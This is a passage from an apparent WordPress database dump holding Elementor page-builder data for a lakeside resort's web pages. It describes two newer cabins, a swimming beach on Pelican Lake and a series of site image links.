:\"25a144c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a1bbc9a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a12116a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74c336e\"}]},\"elements\":[{\"id\":\"e69cdee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Love to stay in a Newer Cabin \\u2013 <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us to book it<\\/a><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"71c9c9f\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"daa79a5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8b7f04d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"02be74a\"}]},\"elements\":[{\"id\":\"91a0fc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5009976\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"cc92fdd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38976b4\"}]},\"elements\":[{\"id\":\"2dd3697\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>#13<\\/strong><\\/p><p>This is one of the newer cabins located on the swimming beach. It is a 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom. Enjoy looking over the lake sitting at the breakfast bar or on the deck. There is a full kitchen, central air conditioning and television. This unit is handicap accessible. This unit is No Smoking, no Pets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0de354b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"51563f4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a399b62\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c6ce686\"}]},\"elements\":[{\"id\":\"90da9a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bac4c3c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"691551b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a6da7ce\"}]},\"elements\":[{\"id\":\"5a1fef2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC05132-1.jpg\",\"id\":350}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05fe721\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"48b0790\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1dc779e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"10aea88\"}]},\"elements\":[{\"id\":\"4de5a2c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3937.jpg\",\"id\":378}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5333298\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"13c67c3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"12adb22\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e5ee1fc\"}]},\"elements\":[{\"id\":\"58909e0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3939.jpg\",\"id\":380}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f1d6275\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"94dfae0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1a806a0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"db0a78a\"}]},\"elements\":[{\"id\":\"d4a2c33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e2ad2df\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"169f623\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"94e664c\"}]},\"elements\":[{\"id\":\"24c7810\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3946.jpg\",\"id\":386}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"910371e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bc94767\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"12bcc27\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b3b5c83\"}]},\"elements\":[{\"id\":\"af9c607\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942.jpg\",\"id\":382}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ca993d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7307f5a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1e3851b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8d18dbc\"}]},\"elements\":[{\"id\":\"5cbedc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3938.jpg\",\"id\":379}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ac3587\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"66bd1f4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"eb116ed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6eb21bc\"}]},\"elements\":[{\"id\":\"98126ac\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"45ebf30\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"237e527\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e166c30\"}]},\"elements\":[{\"id\":\"6ad4744\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>#14<\\/strong><br \\/>Is also one of the newer cabins and is 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom.<br \\/>The deck over looks the lake and this cabin has a fire ring and patio. There is a full kitchen, central air conditioning and television.<br \\/>This is a No Smoking, no Pets unit. test<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"321d0a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2699905\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"50936de\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"93a9ddc\"}]},\"elements\":[{\"id\":\"3473758\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9a06343\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"46d7bbd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"596cd90\"}]},\"elements\":[{\"id\":\"0ebaaa5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/newCabin14.jpg\",\"id\":317}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"916a3db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1c96d80\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1dffc8b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1276762\"}]},\"elements\":[{\"id\":\"c80be6a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3941.jpg\",\"id\":381}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b322842\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"ba166f6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c21e44\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"83a5d56\"}]},\"elements\":[{\"id\":\"6189189\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942.jpg\",\"id\":382}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2309,107,'_elementor_edit_mode','builder'),(2310,107,'_elementor_template_type','post'),(2311,107,'_elementor_version','2.5.13'),(2312,107,'vantage_panels_no_legacy','true'),(2319,107,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2320,107,'_elementor_data','[{\"id\":\"3ae2b8c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1bddbe2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"102e0e8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f4cc01f\"}]},\"elements\":[{\"id\":\"764c7e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7735f8d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8013299\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5890b35\"}]},\"elements\":[{\"id\":\"9d38079\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Fall-Frenzy-001.jpg\",\"id\":363}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7e0553c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"ac3452e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"38a69f9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"20b4796\"}]},\"elements\":[{\"id\":\"2c00e3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3833.jpg\",\"id\":359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2663825\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d0a9239\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"47f7416\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4edb3bb\"}]},\"elements\":[{\"id\":\"ec1eae2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2724.jpg\",\"id\":226}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01de023\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a1101cb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"78b86ac\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9311449\"}]},\"elements\":[{\"id\":\"b6be374\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c26ccce\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a57e4ac\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1d6442f\"}]},\"elements\":[{\"id\":\"3d9652c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/IMG_7500.jpg\",\"id\":25}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"afdc2b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"add9822\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2d52633\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"0312570\"}]},\"elements\":[{\"id\":\"486571f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3760.jpg\",\"id\":229}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b37b2f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b37fa33\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"471ee7e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"bfb7949\"}]},\"elements\":[{\"id\":\"b558c74\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/ashleyslide.jpg\",\"id\":276}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18b0ac5\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"cbb1165\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d993c2c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"fa20e9d\"}]},\"elements\":[{\"id\":\"697d49f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"26d4eda\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0481647\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"956c2b6\"}]},\"elements\":[{\"id\":\"5c8aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC03045.jpg\",\"id\":345}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dda09b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"35f3206\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e2bad3f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b974acd\"}]},\"elements\":[{\"id\":\"8febd97\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Walleye11.jpg\",\"id\":310}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ea37e0b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2c6f18e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"970e8e0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"77ef7f9\"}]},\"elements\":[{\"id\":\"3b9d7e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-124.jpg\",\"id\":293}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53937bf\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4a2285b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"aad1dae\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d692266\"}]},\"elements\":[{\"id\":\"d3d299e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a950b78\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"89e608e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3908e23\"}]},\"elements\":[{\"id\":\"5835d70\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-107.jpg\",\"id\":292}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"956ab73\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3dad711\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"68406cd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"faf04f5\"}]},\"elements\":[{\"id\":\"c5f71c3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-092.jpg\",\"id\":290}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3be40af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d6d5de8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"00af4c5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9404d48\"}]},\"elements\":[{\"id\":\"a342ecc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-106.jpg\",\"id\":291}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d463a54\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"40849f0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dab17ec\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b4b9305\"}]},\"elements\":[{\"id\":\"f269423\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2f0fca1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3f758b8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"fa32b5d\"}]},\"elements\":[{\"id\":\"72f77c1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A great way to spend a hot sunny day is on our sandy beach. The beach is shallow and has a slide in the water. <br \\/>For those that like to hang out in deeper water there is a floating raft. <br \\/>Pelican Lake is a 4,000 acre lake but is also a shallow lake and warms up quite early making it a great place to swim all summer.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2321,806,'_wp_page_template','default'),(2322,806,'_elementor_edit_mode','builder'),(2323,806,'_elementor_template_type','post'),(2324,806,'_elementor_version','2.5.13'),(2325,806,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2326,806,'_elementor_data','[{\"id\":\"3ae2b8c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1bddbe2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"102e0e8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f4cc01f\"}]},\"elements\":[{\"id\":\"764c7e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7735f8d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8013299\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5890b35\"}]},\"elements\":[{\"id\":\"9d38079\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Fall-Frenzy-001.jpg\",\"id\":363}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7e0553c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"ac3452e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"38a69f9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"20b4796\"}]},\"elements\":[{\"id\":\"2c00e3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3833.jpg\",\"id\":359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2663825\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d0a9239\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"47f7416\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4edb3bb\"}]},\"elements\":[{\"id\":\"ec1eae2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2724.jpg\",\"id\":226}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01de023\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a1101cb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"78b86ac\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9311449\"}]},\"elements\":[{\"id\":\"b6be374\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c26ccce\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a57e4ac\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1d6442f\"}]},\"elements\":[{\"id\":\"3d9652c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/IMG_7500.jpg\",